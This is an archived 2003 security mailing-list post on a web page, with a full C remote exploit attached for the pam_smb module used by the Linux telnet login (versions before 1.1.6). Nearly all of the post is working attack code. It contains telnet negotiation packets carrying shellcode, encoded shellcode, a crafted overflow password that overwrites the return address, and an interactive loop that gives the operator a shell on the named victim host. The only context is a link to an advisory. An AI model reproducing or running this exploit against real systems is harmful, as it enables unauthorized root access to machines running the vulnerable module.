The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Linux pam_smb < 1.1.6 login exploit


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Thu, 28 Aug 2003 13:02:48 -0700
From: Huagang Xie <[email protected]>
To: [email protected]
Subject: Linux pam_smb < 1.1.6 login exploit

--+KJYzRxRHjYqLGl5
Content-Type: multipart/mixed; boundary="eHhjakXzOLJAF9wJ"
Content-Disposition: inline


--eHhjakXzOLJAF9wJ
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Adivisory at=20

	http://us2.samba.org/samba/ftp/pam_smb/


--=20
LIDS secure linux kernel
http://www.lids.org/
1024D/B6EFB028 		4731 2BF7 7735 4DBD 3771  4E24 B53B B60A B6EF B028

--eHhjakXzOLJAF9wJ
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="linux_pam_smb.c"
Content-Transfer-Encoding: quoted-printable

/*
 * Linux pam_lib_smb < 1.1.6  /bin/login exploit
 * by vertex =20
 *
 * Tested on Redhat 8.0, 9.0
 *=20
 * greet: nergal, ipxodi.=20
 *=20
 * Advisory at=20
 * 	http://us2.samba.org/samba/ftp/pam_smb/
 *
 * code based on : UC_login.c
 * SunOS 5.6,5.7,5.8 remote /bin/login root exploit
 * [mikecc/unixclan]
 *=20
 * =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 * In order to use pam_lib_smb, need to add following line on top=20
 * of /etc/pam.d/login=20
 *=20
 * auth       required     /lib/security/pam_smb_auth.so
 *=20
 * And config the /etc/pam_smb.conf correctly.
 *=20
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <arpa/telnet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <unistd.h>
#include <getopt.h>

/* first negotiate */
/* packet capture by ethereal */
char packet_1[] =3D {
0xff, 0xfd, 0x03, 0xff, 0xfb, 0x18, 0xff, 0xfb,=20
0x1f, 0xff, 0xfb, 0x20, 0xff, 0xfb, 0x21, 0xff,=20
0xfb, 0x22, 0xff, 0xfb, 0x27, 0xff, 0xfd, 0x05,=20
0xff, 0xfb, 0x23 };
char packet_2[] =3D {
0xff, 0xfa, 0x1f, 0x00, 0x62, 0x00, 0x22, 0xff,=20
0xf0, 0xff, 0xfa, 0x20, 0x00, 0x33, 0x38, 0x34,=20
0x30, 0x30, 0x2c, 0x33, 0x38, 0x34, 0x30, 0x30,=20
0xff, 0xf0, 0xff, 0xfa, 0x23, 0x00, 0x6c, 0x69,=20
0x64, 0x73,=20

/* in between ,adding sc */
0x3a, 0x30, 0xff, 0xf0, 0xff, 0xfa,=20
0x27, 0x00, 0x03, 0x58, 0x41, 0x55, 0x54, 0x48,=20
0x4f, 0x52, 0x49, 0x54, 0x59, 0x01, 0x2f, 0x68,=20
0x6f, 0x6d, 0x65, 0x2f, 0x78, 0x69, 0x65, 0x2f,=20
0x2e, 0x58, 0x61, 0x75, 0x74, 0x68, 0x6f, 0x72,=20
0x69, 0x74, 0x79, 0x00, 0x44, 0x49, 0x53, 0x50,=20
0x4c, 0x41, 0x59, 0x01,=20
};

char packet_2_1[]=3D{

0x6c, 0x69, 0x64, 0x73,=20
0x3a, 0x30, 0xff, 0xf0, 0xff, 0xfa, 0x18, 0x00,=20
0x58, 0x54, 0x45, 0x52, 0x4d, 0xff, 0xf0 };

/* here is the TERM value */
/*
*/

void login(int);
void negotiate(int);
void sendstr(int,char *,int);
void wont(int sd,int opt);
void will(int sd,int opt);
void cmd(int sd,int opt);

/* ascii shellcode by shellforge (by phillipe biodi)*/
unsigned char sc[] =3D
"hAAAAX5AAAAHPPPPPPPPahA000X5nCX0PhA004X5nRYZPh0A"
"DAX5owxnPTYI19II19h0200X5U9knPTYII19I19hA000X5sO"
"kBPTY19I19I19h4000X59cF4PTY19II19I19h0000X5000FP"
"TY19I19h0002X500w9PTYI19I19h0A00X5uR00PTYII19I19"
"h04AAX5ByVyPTY19II19I19h600AX59FMVPTY19I19I19h00"
"0AX500LZPTY19II19h00E0X5Btz0PTYII19hA4A0X5R8p9PT"
"Y19I19II19h0D20X5Lx8LPTY19h0000X5000kPh00A0X5fcV"
"0PTYI19I19h00B0X5eFXgPTYI19II19\xff\xff\xe4";


int main(int argc,char **argv)
{
        struct sockaddr_in sock;
        struct hostent *pHe;
        int sd;  =20
	short port =3D -1;
	int x;
	char *host =3D NULL;
	char *user =3D NULL;
	char exp[1024];=20
	int a;
	char *default_port =3D "23";

	printf("linux_pam_smb\n");
	printf("Linux lib_pam_smb < 1.1.6 /bin/login remote exploit\n");
	printf("[vertex//lids/org]\n\n");
	if (argc < 2)=20
	{
		printf("%s -h <victim> [-p port] \n",argv[0]);
		return 0;
	}
	while ((a =3D getopt(argc,argv,"h:p:u:")) !=3D -1)
	{
		switch (a)=09
		{
			case 'h':
				host =3D optarg;
				break;
		=09
                        case 'p':
                                port =3D atoi(optarg);
                                break;

			default:
				printf("[-] invalid option.\n");
				break;
		}
	}
	if (host =3D=3D NULL)
	{
		printf("[-] must specify a host to attack\n");=20
		return 0;
        }
	if (port < 0)
		port =3D atoi(default_port);
	if ((pHe =3D gethostbyname(host)) =3D=3D NULL)
        {
                printf("Host lookup error.\n");
                return 0;
        }
	printf("[*] attacking %s:%d\n",host,port);
	printf("[*] opening socket\n");
        if ((sd =3D socket(AF_INET,SOCK_STREAM,0)) =3D=3D -1)
        {
                printf("[-] could not create socket");
                return 0;
        }
	sock.sin_family =3D AF_INET;
	sock.sin_port =3D htons(port);
	memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length);
	if ((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) =3D=3D -1)
        {
                printf("[-] failed to connect to %s\n",host); =20
                return 0;
        }
	printf("[*] connected!\n");
	printf("[*] Begin negotiate... \n");
	negotiate(sd);
	printf("[*] Login... \n");
	login(sd);
	return 0;
}


void login(int sd)
{
	char buf[1024];
	char exploit_buf[172];
	char cx[3]=3D"\r\n\0";
	int x;
  	fd_set rset;

	memset(exploit_buf,'\0',172);
	/* let's jump to 0xbffffe30 */
	/* eb 30 fe ff bf */

	x =3D 0;
	exploit_buf[x++]=3D0x68;
	/* push 0xbffffe30 */
	/* shellcode address */
	exploit_buf[x++]=3D0x30;
	exploit_buf[x++]=3D0xfe;
	exploit_buf[x++]=3D0xff;
	exploit_buf[x++]=3D0xff;
	exploit_buf[x++]=3D0xff;
	exploit_buf[x++]=3D0xbf;
	exploit_buf[x++]=3D0xbf;
	/* ret */
	exploit_buf[x++]=3D0xc3;
=09
	memset(exploit_buf+x,'A',150);
	x+=3D150;

/* will jmp in the middle of the NOP */
/* overwrite the eip with 0x40000f4f libc-2.3.2 */
/* at this address it is=20
	pop $exx
	pop $exx
	ret=20
*/
	exploit_buf[x++]=3D0xb5;
	exploit_buf[x++]=3D0xd4;

	sleep(2);

	memset(buf,'\0',sizeof(buf));
	strcpy(buf, "xie\r\n\0");

	printf("[*] sending username \n");
	sendstr(sd,buf,strlen(buf));
=09
	sleep(1);
	printf("[*] sending password\n");
	sleep(2);

	memset(buf,'\0',sizeof(buf));
	strcpy(buf, exploit_buf);
	strcat(buf,"\r\n\0");
	sendstr(sd,buf,strlen(buf));

	sleep(2);
	fflush(stdout);
	FD_ZERO(&rset);
	while (1)
	{
		FD_SET(sd,&rset);
		FD_SET(0,&rset);=20
		select(sd+1,&rset,0,0,0);
		if (FD_ISSET(sd,&rset))=20
		{
			memset(buf,'\0',sizeof(buf));
			if ((x =3D read(sd,buf,sizeof(buf)-1)) =3D=3D 0)
			{
				printf("Connection closed by foreign host.\n");
				exit(-1);
			}
			fprintf(stderr,"%s",buf);
		}
		if (FD_ISSET(0,&rset))
		{
			memset(buf,'\0',sizeof(buf));
			if ((x =3D read(0,buf,sizeof(buf)-1)) > 0)
			{
				write(sd,buf,x);
			}
		}
	}
}	=09

/*
 * telnet negotiation needed for
 * talking with the telnet protocol
*/

void negotiate(int sd)
{
	char buf[1024];
	char nop[64];
	int len;

	sendstr(sd, packet_1,sizeof(packet_1));
	sleep(2);

	memset(buf,'\0',sizeof(buf));
	memset(nop,'A',sizeof(nop));
	memcpy(buf,packet_2,sizeof(packet_2));
	/* adding NOP */
	memcpy(buf+sizeof(packet_2), nop, sizeof(nop));
	/* shellcode */
	memcpy(buf+sizeof(packet_2)+sizeof(nop), sc, sizeof(sc));
	/* left packet */
	memcpy(buf+sizeof(packet_2)+sizeof(nop)+sizeof(sc),packet_2_1,sizeof(packe=
t_2_1));
=09
	len =3D sizeof(packet_2) +sizeof(packet_2_1) + sizeof(nop)+sizeof(sc) ;
	sendstr(sd, buf, len);
	sleep(1);
=09
	/* wont echo */
	wont(sd,TELOPT_ECHO);
	sleep(1);
	/* do echo */
	cmd(sd,TELOPT_ECHO);

	sleep(2);
}

/*=20
 * send a telnet WONT
 *
 * structure of a telnet WONT is:
 * 	1. IAC
 * 	2. WONT
 *	3. what you wont do
 *	(all of the above are found in arpa/telnet.h)
*/

void wont(int sd,int opt)
{
	char buf[3];
	sprintf(buf,"%c%c%c",IAC,WONT,opt);
	write(sd,buf,3); /* no error checking, uh-oh! */
}

/*
 * send a telnet WILL
 *
 * structure of a telnet WILL is:
 *	1. IAC
 *	2. WILL
 *	3. what you will do=20
 *	(all of the above are found in arpa/telnet.h)
*/

void will(int sd,int opt)
{
	char buf[3];
	sprintf(buf,"%c%c%c",IAC,WILL,opt);
        write(sd,buf,3); /* no error checking, uh-oh! */
}  =20
void cmd(int sd,int opt)
{
	char buf[3];
	sprintf(buf,"%c\xfd%c",IAC,opt);
	write(sd,buf,3); /* no error checking, uh-oh! */
}
/*
 *
 */
void sendstr(int sd,char *str,int length)
{

        write(sd,str,length);
	sleep(1);
}



--eHhjakXzOLJAF9wJ--

--+KJYzRxRHjYqLGl5
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE/Tl/ntTu2CrbvsCgRApUGAJ9I0Gd4qb0HgJdAJnqH8CCHpSzEuwCePFZN
jJG3jqg1txbMAkTsTKnL/UI=
=wIV4
-----END PGP SIGNATURE-----

--+KJYzRxRHjYqLGl5--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру